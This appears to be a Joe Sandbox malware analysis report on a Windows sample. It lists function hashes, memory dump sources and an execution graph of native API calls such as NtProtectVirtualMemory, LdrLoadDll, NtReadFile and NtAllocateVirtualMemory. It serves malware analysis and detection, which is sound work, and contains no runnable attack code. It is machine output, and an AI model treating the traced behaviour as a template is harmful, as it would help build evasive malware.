                                                                                        • Instruction Fuzzy Hash: 8031B9B5D052589FCB10CFA9E884ADEFBF0BF4A310F14942AE815B7200C775A946CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA2BC1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00AA2C46
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChangeCloseFindNotification
                                                                                        • String ID: iLc
                                                                                        • API String ID: 2591292051-1587214415
                                                                                        • Opcode ID: 688af962149247860c8bdc7e4c843bab909a1455d369c5b5abb67154149e46c1
                                                                                        • Instruction ID: c64bc3b5dfe324f191c823ca990092ff51e3dd8e285289a7342ae64dfcfeb874
                                                                                        • Opcode Fuzzy Hash: 688af962149247860c8bdc7e4c843bab909a1455d369c5b5abb67154149e46c1
                                                                                        • Instruction Fuzzy Hash: 7C31BBB8D042189FCB10CFA9E984ADEFBF0AF4A320F18905AE815B7310C335A945CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA0310 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00AA2C46
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChangeCloseFindNotification
                                                                                        • String ID: iLc
                                                                                        • API String ID: 2591292051-1587214415
                                                                                        • Opcode ID: 7d65f70609199b8bddf1962e8ab77797c0600eceb618da6fcf3e62b745a66296
                                                                                        • Instruction ID: 56de035e33885484dd3a5f01f76d6e92eb3d57c7f857925727e65889ea64040a
                                                                                        • Opcode Fuzzy Hash: 7d65f70609199b8bddf1962e8ab77797c0600eceb618da6fcf3e62b745a66296
                                                                                        • Instruction Fuzzy Hash: 8831ACB4D042189FCB10CFA9D484ADEFBF4EB4A324F14901AE815B7350D375A945CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA75D0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ResumeThread.KERNELBASE(?), ref: 00AA7646
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID: iLc
                                                                                        • API String ID: 947044025-1587214415
                                                                                        • Opcode ID: 9771f8d1cb9b792b57bdffb532d865ee740df4109f20cea3422cd48b86291e82
                                                                                        • Instruction ID: 775835d34e471691005489f19f6e5bef67a15a0444426f81b00e7a029a0be146
                                                                                        • Opcode Fuzzy Hash: 9771f8d1cb9b792b57bdffb532d865ee740df4109f20cea3422cd48b86291e82
                                                                                        • Instruction Fuzzy Hash: 322198B9D042189FCB10CFA9D884ADEFBF4EB4A324F14901AE815B7310D375A945CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A5D01C Relevance: .1, Instructions: 70COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.313954837.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_a5d000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ea721f84c78a92b1734359e1aa999130ad7f1d3eaa528df6c6939b34ee04e5f6
                                                                                        • Instruction ID: 53f7a0976ff347b444f6d628fa2411f73b82edcadc972747af1105be78ff42ba
                                                                                        • Opcode Fuzzy Hash: ea721f84c78a92b1734359e1aa999130ad7f1d3eaa528df6c6939b34ee04e5f6
                                                                                        • Instruction Fuzzy Hash: A521CFB16082409FDB24DF24D5C4B26BBA5FB84329F24C56DE90A4B286C336DC4AC662
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A5D005 Relevance: .1, Instructions: 58COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.313954837.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_a5d000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2033e4163492731d6eb6d0d5bd2cdf4c430fad881e158c7c1668bae2d207e1a1
                                                                                        • Instruction ID: d9582a9c99312ec57bd00eb97f8fcc732f07a438dfef7526ddc1d584389adbf3
                                                                                        • Opcode Fuzzy Hash: 2033e4163492731d6eb6d0d5bd2cdf4c430fad881e158c7c1668bae2d207e1a1
                                                                                        • Instruction Fuzzy Hash: 2F2193755093C08FDB12DF20D994B15BF71FB46314F28C6EAD8498B697C33A984ACB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 00AA22DC Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: iLc$iLc
                                                                                        • API String ID: 0-2988458713
                                                                                        • Opcode ID: ef6b0020298c6ad9439ca4bf12e116ee8a9f80d93409524c9b301b89ef0eb2b7
                                                                                        • Instruction ID: fd0e8a7602de111345598c48d7ffd86e563988edcea73e5aba7ef0356e611c83
                                                                                        • Opcode Fuzzy Hash: ef6b0020298c6ad9439ca4bf12e116ee8a9f80d93409524c9b301b89ef0eb2b7
                                                                                        • Instruction Fuzzy Hash: FC51F074E002589FCB15CFA9D884BDDFBB1FB8A304F14812AE405AB291DB759945CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA02E0 Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: iLc$iLc
                                                                                        • API String ID: 0-2988458713
                                                                                        • Opcode ID: e631dc8c93389ea78b295947355d389bdcac59460ad25d06acca7153be374862
                                                                                        • Instruction ID: d1a12eb821e137c4d5e8401c5b4ee78bbf2036f44be7cfaf846d44f68681b5cd
                                                                                        • Opcode Fuzzy Hash: e631dc8c93389ea78b295947355d389bdcac59460ad25d06acca7153be374862
                                                                                        • Instruction Fuzzy Hash: 4051F274E002189FDB14CFA9D884BEDFBB1FB8A304F14812AE415BB290DB759945CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA2C95 Relevance: 2.6, Strings: 2, Instructions: 136COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: iLc$iLc
                                                                                        • API String ID: 0-2988458713
                                                                                        • Opcode ID: efee4f94ffd2df548ff7bcd09db7845f41fc1aa941d4fe1b23a33b4ee85fd2a7
                                                                                        • Instruction ID: f923a564e66af7e8604ed2e63ef5a8cb143b8db137727f787462241ae810950d
                                                                                        • Opcode Fuzzy Hash: efee4f94ffd2df548ff7bcd09db7845f41fc1aa941d4fe1b23a33b4ee85fd2a7
                                                                                        • Instruction Fuzzy Hash: 6851F0B0D002588FDB24CFA9C885BEEFBB1BF4A304F14812AD815BB291DB749845CF81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA28C4 Relevance: 2.6, Strings: 2, Instructions: 136COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: iLc$iLc
                                                                                        • API String ID: 0-2988458713
                                                                                        • Opcode ID: bb4b78f8a99014105842378b9193b64b5754de66a9093923db44cc470e70b412
                                                                                        • Instruction ID: 7311ba204ae8af547cef2f2cd2d6b7cdc72260bafd082076571c5ffd114306eb
                                                                                        • Opcode Fuzzy Hash: bb4b78f8a99014105842378b9193b64b5754de66a9093923db44cc470e70b412
                                                                                        • Instruction Fuzzy Hash: AF5100B4E002588FCB24CFA9D884BEEFBB1BF4A704F14812AD855BB290DB755845CF85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA0304 Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: iLc$iLc
                                                                                        • API String ID: 0-2988458713
                                                                                        • Opcode ID: 5ab528ef8a36d4b9480fcfc232cfe27e83f6e29bee59442c70408ed157149d36
                                                                                        • Instruction ID: 3888c5d4119862371cfb02b5b839fbf266a256a848b950af940749399a6b3359
                                                                                        • Opcode Fuzzy Hash: 5ab528ef8a36d4b9480fcfc232cfe27e83f6e29bee59442c70408ed157149d36
                                                                                        • Instruction Fuzzy Hash: 9E51E0B4D00258DFCB24CFA9D884BEEFBB1BB4A704F14812AE455BB290DB755845CF85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA031C Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.314113549.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_aa0000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: iLc$iLc
                                                                                        • API String ID: 0-2988458713
                                                                                        • Opcode ID: 6bda5631a5a95f5c29d7d839334a1c17684a1d8b9369e5e908c543d070d50041
                                                                                        • Instruction ID: 85ee317b761a76337de852a5066df23930bf69a9f96d1407b8810ad15b192daf
                                                                                        • Opcode Fuzzy Hash: 6bda5631a5a95f5c29d7d839334a1c17684a1d8b9369e5e908c543d070d50041
                                                                                        • Instruction Fuzzy Hash: BD51DFB4D002189FDB24CFA9C884BEEFBB1FB4A304F14812AE415BB291DB759845CF85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:4.3%
                                                                                        Dynamic/Decrypted Code Coverage:3.2%
                                                                                        Signature Coverage:6%
                                                                                        Total number of Nodes:470
                                                                                        Total number of Limit Nodes:67
                                                                                        execution_graph 31475 4014e9 31478 4014f0 NtProtectVirtualMemory 31475->31478 31477 401570 31482 4230a7 31477->31482 31485 423098 31477->31485 31478->31477 31479 40157b 31489 41f607 31482->31489 31486 4230a7 31485->31486 31487 41f607 24 API calls 31486->31487 31488 4230b2 31487->31488 31488->31479 31490 41f62d 31489->31490 31503 40b3f7 31490->31503 31492 41f639 31502 41f693 31492->31502 31511 40f637 31492->31511 31494 41f64e 31495 41f661 31494->31495 31521 40f5f7 31494->31521 31498 41f676 31495->31498 31557 41e277 31495->31557 31525 40d217 31498->31525 31500 41f685 31501 41e277 ExitProcess 31500->31501 31501->31502 31502->31479 31504 40b404 31503->31504 31560 40b347 31503->31560 31506 40b40b 31504->31506 31567 40b2e7 31504->31567 31506->31492 31512 40f663 31511->31512 31832 40f507 31512->31832 31515 40f690 31517 40f69b 31515->31517 31519 41e057 NtClose 31515->31519 31516 40f6a8 31518 40f6b9 31516->31518 31520 41e057 NtClose 31516->31520 31517->31494 31518->31494 31519->31517 31520->31518 31522 40f616 31521->31522 31523 40f61d 31522->31523 31524 40f61f GetUserGeoID 31522->31524 31523->31495 31524->31495 31527 40d23c 31525->31527 31526 40d50a 31526->31500 31527->31526 31843 418057 31527->31843 31529 40d2fe 31529->31526 31846 4095e7 31529->31846 31531 40d342 31531->31526 31868 41e0c7 31531->31868 31535 40d398 31536 40d39f 31535->31536 31879 41dbd7 31535->31879 31538 41fb27 RtlFreeHeap 31536->31538 31540 40d3ac 31538->31540 31540->31500 31541 40d3e9 31542 41fb27 RtlFreeHeap 31541->31542 31543 40d3f0 31542->31543 31543->31500 31544 40d3f9 31545 40f6c7 2 API calls 31544->31545 31546 40d46d 31545->31546 31546->31536 31547 40d478 31546->31547 31548 41fb27 RtlFreeHeap 31547->31548 31549 40d49c 31548->31549 31883 41dc27 31549->31883 31552 41dbd7 LdrInitializeThunk 31553 40d4d7 31552->31553 31553->31526 31887 41d9e7 31553->31887 31556 41e277 ExitProcess 31556->31526 31558 41e296 ExitProcess 31557->31558 31559 41eb97 31557->31559 31559->31558 31562 40b35a 31560->31562 31561 40b36d 31561->31504 31562->31561 31582 41ef47 31562->31582 31564 40b3aa 31564->31561 31593 40b187 31564->31593 31566 40b3ca 31566->31504 31568 40b301 31567->31568 31569 41f237 LdrLoadDll 31567->31569 31815 41f237 31568->31815 31569->31568 31572 41f237 LdrLoadDll 31573 40b328 31572->31573 31574 40f3f7 31573->31574 31576 40f410 31574->31576 31575 40b41c 31575->31492 31576->31575 31824 41e397 31576->31824 31578 40f449 31579 40f474 31578->31579 31827 41de27 31578->31827 31581 41e057 NtClose 31579->31581 31581->31575 31583 41ef60 31582->31583 31599 418727 31583->31599 31585 41ef81 31585->31564 31586 41ef78 31586->31585 31628 41ed87 31586->31628 31588 41ef95 31588->31585 31641 41dac7 31588->31641 31596 40b1a1 31593->31596 31793 4089c7 31593->31793 31595 40b1a8 31595->31566 31596->31595 31806 408c87 31596->31806 31600 41873b 31599->31600 31601 41884f 31599->31601 31600->31601 31648 41df27 31600->31648 31601->31586 31603 418893 31604 41fb27 RtlFreeHeap 31603->31604 31605 41889f 31604->31605 31605->31601 31606 418a2e 31605->31606 31607 418a44 31605->31607 31612 418937 31605->31612 31608 41e057 NtClose 31606->31608 31698 418447 NtReadFile NtClose 31607->31698 31609 418a35 31608->31609 31609->31586 31611 418a57 31611->31586 31613 41899e 31612->31613 31614 418946 31612->31614 31613->31606 31622 4189b1 31613->31622 31615 41894b 31614->31615 31616 41895f 31614->31616 31694 418307 NtClose LdrInitializeThunk LdrInitializeThunk 31615->31694 31618 418964 31616->31618 31619 41897c 31616->31619 31652 4183a7 31618->31652 31619->31609 31662 4180c7 31619->31662 31620 418955 31620->31586 31695 41e057 31622->31695 31623 418972 31623->31586 31626 418994 31626->31586 31627 418a1d 31627->31586 31630 41eda2 31628->31630 31629 41edb4 31629->31588 31630->31629 31716 41faa7 31630->31716 31632 41edd4 31719 417d27 31632->31719 31634 41edf7 31634->31629 31635 417d27 2 API calls 31634->31635 31637 41ee19 31635->31637 31637->31629 31751 419077 31637->31751 31638 41eea1 31762 41da87 31638->31762 31642 41dae3 31641->31642 31787 11d967a 31642->31787 31643 41dafe 31645 41fb27 31643->31645 31790 41e237 31645->31790 31647 41eff0 31647->31564 31699 41eb97 31648->31699 31650 41df43 NtCreateFile 31650->31603 31651 41df96 31650->31651 31651->31603 31653 4183c3 31652->31653 31654 4183eb 31653->31654 31655 4183ff 31653->31655 31656 41e057 NtClose 31654->31656 31657 41e057 NtClose 31655->31657 31658 4183f4 31656->31658 31659 418408 31657->31659 31658->31623 31701 41fd37 RtlAllocateHeap 31659->31701 31661 418413 31661->31623 31663 418112 31662->31663 31664 418145 31662->31664 31665 41e057 NtClose 31663->31665 31666 418161 31664->31666 31672 418290 31664->31672 31667 418136 31665->31667 31668 418183 31666->31668 31669 418198 31666->31669 31667->31626 31673 41e057 NtClose 31668->31673 31670 4181b3 31669->31670 31671 41819d 31669->31671 31682 4181b8 31670->31682 31702 41fcf7 31670->31702 31674 41e057 NtClose 31671->31674 31675 41e057 NtClose 31672->31675 31676 41818c 31673->31676 31677 4181a6 31674->31677 31679 4182f0 31675->31679 31676->31626 31677->31626 31678 4181ca 31678->31626 31679->31626 31682->31678 31705 41dfd7 31682->31705 31683 41821e 31684 418251 31683->31684 31685 41823c 31683->31685 31687 41e057 NtClose 31684->31687 31686 41e057 NtClose 31685->31686 31686->31678 31688 41825a 31687->31688 31689 418286 31688->31689 31708 41f8f7 31688->31708 31689->31626 31691 418271 31692 41fb27 RtlFreeHeap 31691->31692 31693 41827a 31692->31693 31693->31626 31694->31620 31696 41eb97 31695->31696 31697 41e073 NtClose 31696->31697 31697->31627 31698->31611 31700 41eba6 31699->31700 31700->31650 31701->31661 31713 41e1f7 31702->31713 31704 41fd0f 31704->31682 31706 41eb97 31705->31706 31707 41dff3 NtReadFile 31706->31707 31707->31683 31709 41f904 31708->31709 31710 41f91b 31708->31710 31709->31710 31711 41fcf7 RtlAllocateHeap 31709->31711 31710->31691 31712 41f932 31711->31712 31712->31691 31714 41e205 31713->31714 31715 41e213 RtlAllocateHeap 31714->31715 31715->31704 31766 41e107 31716->31766 31718 41fad4 31718->31632 31720 417d38 31719->31720 31721 417d40 31719->31721 31720->31634 31750 418013 31721->31750 31769 420cd7 31721->31769 31723 417d94 31724 420cd7 RtlAllocateHeap 31723->31724 31725 417d9f 31724->31725 31726 417ded 31725->31726 31729 420e07 2 API calls 31725->31729 31780 420d77 RtlAllocateHeap RtlFreeHeap 31725->31780 31728 420cd7 RtlAllocateHeap 31726->31728 31731 417e01 31728->31731 31729->31725 31730 417e5e 31732 420cd7 RtlAllocateHeap 31730->31732 31731->31730 31774 420e07 31731->31774 31734 417e74 31732->31734 31735 417eb1 31734->31735 31737 420e07 2 API calls 31734->31737 31736 420cd7 RtlAllocateHeap 31735->31736 31738 417ebc 31736->31738 31737->31734 31739 420e07 2 API calls 31738->31739 31746 417ef6 31738->31746 31739->31738 31741 417feb 31782 420d37 RtlFreeHeap 31741->31782 31743 417ff5 31783 420d37 RtlFreeHeap 31743->31783 31745 417fff 31784 420d37 RtlFreeHeap 31745->31784 31781 420d37 RtlFreeHeap 31746->31781 31748 418009 31785 420d37 RtlFreeHeap 31748->31785 31750->31634 31752 419088 31751->31752 31753 418727 7 API calls 31752->31753 31758 41909e 31753->31758 31754 4190a7 31754->31638 31755 4190de 31756 41fb27 RtlFreeHeap 31755->31756 31757 4190ef 31756->31757 31757->31638 31758->31754 31758->31755 31759 41912a 31758->31759 31760 41fb27 RtlFreeHeap 31759->31760 31761 41912f 31760->31761 31761->31638 31763 41daa3 31762->31763 31786 11d9860 LdrInitializeThunk 31763->31786 31764 41daba 31764->31588 31767 41e123 NtAllocateVirtualMemory 31766->31767 31768 41eb97 31766->31768 31767->31718 31768->31767 31770 420ce7 31769->31770 31771 420ced 31769->31771 31770->31723 31772 41fcf7 RtlAllocateHeap 31771->31772 31773 420d13 31772->31773 31773->31723 31775 420d77 31774->31775 31776 420dd4 31775->31776 31777 420db1 31775->31777 31778 41fcf7 RtlAllocateHeap 31775->31778 31776->31731 31779 41fb27 RtlFreeHeap 31777->31779 31778->31777 31779->31776 31780->31725 31781->31741 31782->31743 31783->31745 31784->31748 31785->31750 31786->31764 31788 11d968f LdrInitializeThunk 31787->31788 31789 11d9681 31787->31789 31788->31643 31789->31643 31791 41e253 RtlFreeHeap 31790->31791 31792 41eb97 31790->31792 31791->31647 31792->31791 31794 4089d2 31793->31794 31795 4089d7 31793->31795 31794->31596 31796 41faa7 NtAllocateVirtualMemory 31795->31796 31799 4089fc 31796->31799 31797 408a5f 31797->31596 31798 41da87 LdrInitializeThunk 31798->31799 31799->31797 31799->31798 31801 408a65 31799->31801 31805 41faa7 NtAllocateVirtualMemory 31799->31805 31810 41e187 31799->31810 31802 408a8b 31801->31802 31803 41e187 LdrInitializeThunk 31801->31803 31802->31596 31804 408a7c 31803->31804 31804->31596 31805->31799 31807 408c9d 31806->31807 31808 41e187 LdrInitializeThunk 31807->31808 31809 408ca5 31808->31809 31809->31566 31811 41e1a3 31810->31811 31814 11d96e0 LdrInitializeThunk 31811->31814 31812 41e1ba 31812->31799 31814->31812 31816 41f25a 31815->31816 31819 40c3d7 31816->31819 31818 40b312 31818->31572 31821 40c3fb 31819->31821 31820 40c402 31820->31818 31821->31820 31822 40c437 LdrLoadDll 31821->31822 31823 40c44e 31821->31823 31822->31823 31823->31818 31825 41e3b6 LookupPrivilegeValueW 31824->31825 31826 41eb97 31824->31826 31825->31578 31826->31825 31828 41de43 31827->31828 31831 11d9910 LdrInitializeThunk 31828->31831 31829 41de62 31829->31579 31831->31829 31833 40f521 31832->31833 31837 40f5d7 31832->31837 31838 41db47 31833->31838 31836 41e057 NtClose 31836->31837 31837->31515 31837->31516 31839 41db63 31838->31839 31842 11d9fe0 LdrInitializeThunk 31839->31842 31840 40f5cb 31840->31836 31842->31840 31844 40f6c7 2 API calls 31843->31844 31845 41807d 31844->31845 31845->31529 31891 409817 31846->31891 31848 409605 31849 4089c7 3 API calls 31848->31849 31850 4096e3 31848->31850 31854 40980d 31848->31854 31858 409643 31849->31858 31851 4097c3 31850->31851 31852 4089c7 3 API calls 31850->31852 31850->31854 31851->31854 31930 40f937 9 API calls 31851->31930 31865 409720 31852->31865 31854->31531 31855 4097d7 31855->31854 31931 40f937 9 API calls 31855->31931 31857 4097ed 31857->31854 31932 40f937 9 API calls 31857->31932 31858->31850 31862 4096d9 31858->31862 31905 4092c7 31858->31905 31860 409803 31860->31531 31863 408c87 LdrInitializeThunk 31862->31863 31863->31850 31864 4092c7 17 API calls 31864->31865 31865->31851 31865->31864 31866 4097b9 31865->31866 31867 408c87 LdrInitializeThunk 31866->31867 31867->31851 31869 41e0e3 31868->31869 32046 11d98f0 LdrInitializeThunk 31869->32046 31870 40d379 31872 40f6c7 31870->31872 31873 40f6e4 31872->31873 32047 41db87 31873->32047 31876 40f72c 31876->31535 31877 41dbd7 LdrInitializeThunk 31878 40f755 31877->31878 31878->31535 31880 41dbf3 31879->31880 32052 11d9780 LdrInitializeThunk 31880->32052 31881 40d3dc 31881->31541 31881->31544 31884 41dc43 31883->31884 32053 11d97a0 LdrInitializeThunk 31884->32053 31885 40d4b0 31885->31552 31888 41da03 31887->31888 32054 11d9a20 LdrInitializeThunk 31888->32054 31889 40d503 31889->31556 31892 40983e 31891->31892 31893 4089c7 3 API calls 31892->31893 31900 409a93 31892->31900 31894 409891 31893->31894 31895 408c87 LdrInitializeThunk 31894->31895 31894->31900 31896 409920 31895->31896 31897 4089c7 3 API calls 31896->31897 31896->31900 31898 409935 31897->31898 31899 408c87 LdrInitializeThunk 31898->31899 31898->31900 31903 409995 31899->31903 31900->31848 31901 4089c7 3 API calls 31901->31903 31902 4092c7 17 API calls 31902->31903 31903->31900 31903->31901 31903->31902 31904 408c87 LdrInitializeThunk 31903->31904 31904->31903 31906 4092ec 31905->31906 31907 409340 31906->31907 31908 4093c1 31906->31908 31909 41dac7 LdrInitializeThunk 31906->31909 31907->31858 31965 40f817 NtClose 31908->31965 31910 409364 31909->31910 31910->31908 31912 40936f 31910->31912 31914 4093ed 31912->31914 31933 40d517 31912->31933 31913 4093dc 31915 4093e3 31913->31915 31919 4093f9 31913->31919 31914->31858 31917 41e057 NtClose 31915->31917 31917->31914 31918 409389 31918->31914 31953 4090f7 31918->31953 31921 40d517 4 API calls 31919->31921 31923 409444 31921->31923 31923->31914 31924 41d9e7 LdrInitializeThunk 31923->31924 31925 409492 31924->31925 31926 41e057 NtClose 31925->31926 31927 40949c 31926->31927 31966 408ec7 31927->31966 31929 4094b0 31929->31858 31930->31855 31931->31857 31932->31860 31934 40d542 31933->31934 31935 40f6c7 2 API calls 31934->31935 31936 40d5a1 31935->31936 31937 41dbd7 LdrInitializeThunk 31936->31937 31946 40d5ea 31936->31946 31938 40d5cc 31937->31938 31939 40d5d3 31938->31939 31941 40d5f6 31938->31941 31940 41dc27 LdrInitializeThunk 31939->31940 31942 40d5e0 31940->31942 31944 40d660 31941->31944 31945 40d640 31941->31945 31943 41e057 NtClose 31942->31943 31943->31946 31948 41dc27 LdrInitializeThunk 31944->31948 31947 41e057 NtClose 31945->31947 31946->31918 31949 40d64d 31947->31949 31950 40d672 31948->31950 31949->31918 31951 41e057 NtClose 31950->31951 31952 40d67c 31951->31952 31952->31918 31954 40910d 31953->31954 31978 41d3f7 31954->31978 31956 409126 31961 409298 31956->31961 31999 408cc7 31956->31999 31958 40920c 31959 408ec7 11 API calls 31958->31959 31958->31961 31960 40923a 31959->31960 31960->31961 31962 41dac7 LdrInitializeThunk 31960->31962 31961->31858 31963 40926f 31962->31963 31963->31961 31964 41e0c7 LdrInitializeThunk 31963->31964 31964->31961 31965->31913 31967 408ef0 31966->31967 32031 408e37 31967->32031 31970 41e0c7 LdrInitializeThunk 31971 408f03 31970->31971 31971->31970 31972 408f8e 31971->31972 31974 408f89 31971->31974 32037 40f897 31971->32037 31972->31929 31973 41e057 NtClose 31975 408fc1 31973->31975 31974->31973 31975->31972 31976 418727 7 API calls 31975->31976 31977 4090df 31976->31977 31977->31929 31979 41fcf7 RtlAllocateHeap 31978->31979 31980 41d40e 31979->31980 32006 40aa27 31980->32006 31982 41d429 31983 41d44a 31982->31983 31984 41d45e 31982->31984 31985 41fb27 RtlFreeHeap 31983->31985 31987 41faa7 NtAllocateVirtualMemory 31984->31987 31986 41d454 31985->31986 31986->31956 31988 41d4c5 31987->31988 31989 41faa7 NtAllocateVirtualMemory 31988->31989 31990 41d4de 31989->31990 31996 41d7ae 31990->31996 32012 41fae7 31990->32012 31993 41d79a 31994 41fb27 RtlFreeHeap 31993->31994 31995 41d7a4 31994->31995 31995->31956 31997 41fb27 RtlFreeHeap 31996->31997 31998 41d803 31997->31998 31998->31956 32000 408dc6 31999->32000 32001 408cdc 31999->32001 32000->31958 32001->32000 32002 418727 7 API calls 32001->32002 32003 408d49 32002->32003 32004 41fb27 RtlFreeHeap 32003->32004 32005 408d70 32003->32005 32004->32005 32005->31958 32007 40aa4c 32006->32007 32008 40c3d7 LdrLoadDll 32007->32008 32009 40aa7f 32008->32009 32011 40aaa4 32009->32011 32015 40df47 32009->32015 32011->31982 32026 41e147 32012->32026 32016 40df73 32015->32016 32017 40df93 32016->32017 32022 41dde7 32016->32022 32017->32011 32019 40dfb6 32019->32017 32020 41e057 NtClose 32019->32020 32021 40dff1 32020->32021 32021->32011 32023 41de03 32022->32023 32025 11d9710 LdrInitializeThunk 32023->32025 32024 41de1e 32024->32019 32025->32024 32027 41e163 32026->32027 32030 11d9a00 LdrInitializeThunk 32027->32030 32028 41d793 32028->31993 32028->31996 32030->32028 32032 408e4f 32031->32032 32033 40c3d7 LdrLoadDll 32032->32033 32034 408e6a 32033->32034 32035 408e83 PostThreadMessageW 32034->32035 32036 408e97 32034->32036 32035->32036 32036->31971 32038 40f8aa 32037->32038 32041 41da57 32038->32041 32042 41da73 32041->32042 32045 11d9840 LdrInitializeThunk 32042->32045 32043 40f8d5 32043->31971 32045->32043 32046->31870 32048 41dba3 32047->32048 32051 11d99a0 LdrInitializeThunk 32048->32051 32049 40f725 32049->31876 32049->31877 32051->32049 32052->31881 32053->31885 32054->31889 32056 11d9540 LdrInitializeThunk

                                                                                        Executed Functions

                                                                                        Function 0041E101 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memorynativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 41e101-41e144 call 41eb97 NtAllocateVirtualMemory
                                                                                        APIs
